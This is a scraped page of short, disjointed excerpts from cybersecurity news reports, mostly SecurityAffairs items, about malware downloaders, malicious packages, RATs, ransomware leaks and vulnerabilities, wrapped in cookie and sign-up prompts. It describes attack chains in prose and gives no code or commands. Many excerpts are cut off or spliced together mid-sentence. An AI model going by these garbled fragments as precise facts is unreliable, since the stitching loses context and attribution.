This site uses cookies to improve your experience. To help us insure we adhere to various privacy regulations, please select your country/region of residence. If you do not select a country, we will assume you are from the United States. Select your Cookie Settings or view our Privacy Policy and Terms of Use.
Cookie Settings
Cookies and similar technologies are used on this website for proper function of the website, for tracking performance analytics and for marketing purposes. We and some of our third-party providers may use cookie data for various purposes. Please review the cookie settings below and choose your preference.
Used for the proper function of the website
Used for monitoring website traffic and interactions
Cookie Settings
Cookies and similar technologies are used on this website for proper function of the website, for tracking performance analytics and for marketing purposes. We and some of our third-party providers may use cookie data for various purposes. Please review the cookie settings below and choose your preference.
Strictly Necessary: Used for the proper function of the website
Performance/Analytics: Used for monitoring website traffic and interactions
Mexico’s president announced the government is investigating an alleged ransomware hack that targeted the administration’s legal affairs office. Today they are going to send me a report on the supposed hacking.” This is not the first time Mexico’s presidential office has been targeted in a hack involving sensitive information.
” Fake file converters and download tools may perform advertised tasks but can provide resulting files containing hidden malware, giving criminals access to victims’ devices. “To conduct this scheme, cyber criminals across the globe are using any type of free document converter or downloader tool. .
Initially, the group published screenshots of stolen data as proof of the attack, now the whole archive can be downloaded from the leak page. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini ( SecurityAffairs hacking, ransomware)
is the recommended library for integrating a JavaScript/TypeScript app with the XRP, it has more than 140.000 weekly downloads. Hundreds of thousands of applications and websites use this package, the package has been downloaded over 2.9 It is the official SDK for the XRP Ledger, with more than 140.000 weekly downloads.”
“Since March 2025, Check Point Research has been tracking malicious GitHub repositories targeting Minecraft users with an undetected Java downloader.” Upon launching the game, the fake mod downloads a second-stage stealer, which then fetches an additional.NET-based stealer.
Cyber criminals gain unauthorized access to home networks by either configuring the product with malicious software prior to the users purchase or infecting the device as it downloads required applications that contain backdoors, usually during the set-up process. 3 ” reads the alert published by the FBI. ” BADBOX 2.0
Once executed, it downloads the payload directly into memory. “Once opened, the LNK file executes a Powershell command to download an MSI file from a remote server, renames it as “%AppData%y.msi”, and then executes/installs it using the Microsoft msiexec.exe tool.” lnk” that, once executed, starts the attack chain.
The unauthenticated RCE security vulnerability PSV-2023-0039 impacts the following product models: XR1000, the issue was fixed in firmware version 1.0.0.74 XR500, the issue was fixed in firmware version 2.3.2.134 “NETGEAR strongly recommends that you download the latest firmware as soon as possible.” Click Downloads.
Threat actors stole certain internal documents, including files containing personal information. Names and Social Security numbers were compromised in the attack. “Belk maintains a written informationsecurity program. The stolen data are available for download, a circumstance that suggests a failed negotiation.
The attack involves executing a cmd script followed by a PowerShell script, which downloads three executables, including the Amadey botnet and two.NET executables (32-bit and 64-bit). The malware, dubbed PackerE, downloads an encrypted DLL (PackerD1) that employs multiple anti-analysis techniques.
We’ve archived the leak and made it available for download on GitHub.” We've archived the leak and made it available for download on GitHub. ” Yesterday Banshee Stealer, the MacOS-based Malware-as-a-Service infostealer, had their source code leaked online.
WebTunnel is a stealthy bridge that blends with web traffic, with a small download size and uTLS integration, making it safer and harder to detect for users. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini ( SecurityAffairs – hacking, WebTunnel bridges)
The threat actors also employed two new downloaders, called RustClaw and MeltingClaw, plus two backdoors, DustyHammock (Rust-based) and C++-based ShadyHammock. “The downloaders make way for and establish persistence for two distinct backdoors we call “DustyHammock” and “ShadyHammock,” respectively.”
The backdoor is distributed through: Phishing emails with themes such as code of conduct to trick users into downloading the malware. Upon executing the archive, it drops a malicious Windows executable, which eventually downloads and executesthe PLAYFULGHOST payloadfrom a remote server. sys driver.
GreyNoise also observed an instance of an attack using wget to download a shell script for reverse shell access. used in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63 should take immediate action to patch the discovered vulnerabilities and secure their systems. .
Attackers can exploit a vulnerability, tracked as CVE-2025-0411 , in the free, open-source file archiver software 7-Zip to bypass the Mark of the Web (MotW) Windows security feature. Mark of the Web (MotW) is a security feature in Microsoft Windows that identifies files downloaded from untrusted sources, such as the internet.
CrowdStrike warns of a phishing campaign that uses its recruitment branding to trick recipients into downloading a fake application, which finally installs the XMRig cryptominer. “Victims are prompted to download and run a fake application, which serves as a downloader for the cryptominerXMRig.”
A large-scale phishing campaign targets WordPress WooCommerce users with a fake security alert urging them to download a ‘critical patch’ hiding a backdoor. Patchstack researchers uncovered a large-scale phishing campaign targeting WordPress WooCommerce users with a fake security alert. ” concludes the report.
At this stage in our investigation, we have determined that a small number of files that were not authorized for public download may have been published. As of now, we have not observed any confidential information such as sensitive PII or financial data to be included but continue to investigate to confirm.
Researchers found a fake Bitdefender site spreading the Venom RAT by tricking users into downloading it as antivirus software. DomainTools Intelligence (DTI) researchers warn of a malicious campaign using a fake website (bitdefender-download[.]com)
” Recently, The Federal Office for InformationSecurity (BSI) announced it had blocked communication between the 30,000 devices infected with the BadBox malware and the C2. BadBox can also download additional payloads, amplifying the risks for the users. .” continues the report “Second, let’s talk volume.
In March–April 2024, during incident response within the information and communication system of a central executive body, Ukraine’s Computer and Emergency Response identified a Windows system infected with BEARDSHELL and SLIMAGENT. BEARDSHELL and SLIMAGENT are two advanced malware tools written in C++.
Researchers found 3 malicious Go modules with hidden code that can download payloads to wipe a Linux system’s main disk, making it unbootable. ” The executions of the malicious modules can cause total data loss, major downtime, and severe financial and reputational harm, highlighting the need for strong supply chain security.
The Internet Archive was breached again, attackers hacked its Zendesk email support platform through stolen GitLab authentication tokens. This file contained an authentication token that allowed the attacker to download the Internet Archive’s source code, which included additional credentials and tokens.
” The malicious packages discovered by the experts are posing as Solana tools and have 130+ downloads, using Nodemailer to steal keys via Gmail and automate wallet draining. “It is important to verify a packages authenticity by examining its download counts, publisher history, and any associated GitHub repository links.
Russia-linked Gamaredon targets Ukraine with a phishing campaign using troop-related lures to deploy the Remcos RAT via PowerShell downloader. The threat actor is using troop-related lures to deploy the Remcos RAT via PowerShell downloader. Talos researchers warn that Russia-linked APT group Gamaredon (a.k.a.
North Korea-linked hackers uploaded 67 malicious npm packages with XORIndex malware, hitting 17K+ downloads in ongoing supply chain attacks. This follows the earlier HexEval loader campaign, still ongoing with over 8,000 downloads. Despite takedown efforts, 27 packages remain live. ” continues the report.
“We urge the public to be cautious when downloading packages and to ensure they are from trusted sources to avoid falling victim to such attacks.” ” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini ( SecurityAffairs hacking,malicious NPM packages) .” concludes the report.
CYFIRMA researchers discovered that the SpyLend Android malware was downloaded 100,000 times from the official app store Google Play. The Finance Simplified app is still available on Google Play at the time of this reports publication, with downloads doubling to 100,000 in a week. ” reads the report published by CYFIRMA.
The threat actors use the Civil Defense website to distribute multiple software programs that, once installed, download different malware families. The site provides a downloader called Pronsis Loader to Windows users, this malware starts an attack chain, ultimately installing SUNSPINNER and the PURESTEALER information stealer. .
The first vulnerability, CVE-2024-57727 (CVSS score of 7.5), is an unauthenticated path traversal issue allowing attackers to download arbitrary files from the server. At the end of January, researchers from security firm Arctic Wolf reported a campaign targeting SimpleHelp servers.
BusyBox enables threat actors to perform various functions such as download and execute payloads on compromised devices.” ” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini ( SecurityAffairs hacking, CISA)
In this attack phase, a PowerShell script downloads an archive from the command-and-control server containing the Node.js In a documented instance, attackers used a ClickFix social engineering tactic to trick users into running a PowerShell command that downloads and installs Node.js runtime and a compiled JavaScript file. components.
To extract cookies from Chromium-based browsers, it downloads a module from the C&C to bypass App-Bound encryption. More information, including IoCs and the lists of locally installed apps and browser extensions, are available on GitHub. ” reads the report published by Gen Digital.
“The campaign leveraged fake CAPTCHA verification pages (ClickFix/KongTuke lures) to trick users into executing a copied PowerShell command, which downloaded and ran MintsLoader” The experts observed other infection chains that used fake invoice files (e.g., “Fattura####.js”)
Sansec researchers reported that multiple vendors were hacked in a coordinated supply chain attack, the experts discovered that a backdoor was hidden in 21 applications. “This hack is called a Supply Chain Attack, which is one of the worst types. Meetanshi claims no tampering but confirms their server was hacked.
Upon running the code as an administrator, it downloads and installs a browser-based remote desktop tool and downloads a certificate file with a hardcoded PIN from a remote server. When opened, they execute PowerShell or Mshta to download malware like PebbleDash and RDP Wrapper, to control the infected systems.
The script will download and run the.NET bootloader MSCommondll.exe,which in turn will download and run the malware DarkCrystal RAT. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini ( SecurityAffairs hacking,Ukraine)
contacted a hardcoded C&C server to download configuration and executed HTTP calls, and content.js Follow me on Twitter: @securityaffairs and Facebook and Mastodon PierluigiPaganini ( SecurityAffairs hacking,Google Chrome) The malicious extension used two files: worker.js
” FrameworkLoader downloads LightSpy’s Core module and the plugins used by the spyware. That is why it will download an additional file “resources.zip” which also contains jailbreak-helping files which are related to the jailbreak process on iOS version family 12.” ” continues the report.
Serbian authorities also extensively and illegitimately used the Cellebrite extraction suite to download personal data from the phones of journalists and protest organizers. ” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini ( SecurityAffairs hacking,NoviSpy)
The campaign is still ongoing and the malicious packages collectively totaled more than one thousand downloads. The attack has led to the identification of 20 malicious packages published by three primary authors, with the most downloaded package, @nomicsfoundation/sdk-test , accumulating 1,092 downloads.”
” In September, security researchers from G DATA discovered more than two dozen Android mobile phones from different manufacturers already infected by pre-installed malware. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini ( SecurityAffairs hacking,Chinese Android phone )
PCMag cited the case of a gamer who downloaded the game and reported that his accounts were hijacked using stolen cookies. SteamDB estimates that over 800 users may have downloaded the game. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini ( SecurityAffairs hacking,Valve)
We organize all of the trending information in your field so you don't have to. Join 28,000+ users and stay up to date on the latest articles your peers are reading.
You know about us, now we want to get to know you!
Let's personalize your content
Let's get even more personalized
We recognize your account from another site in our network, please click 'Send Email' below to continue with verifying your account and setting a password.
Let's personalize your content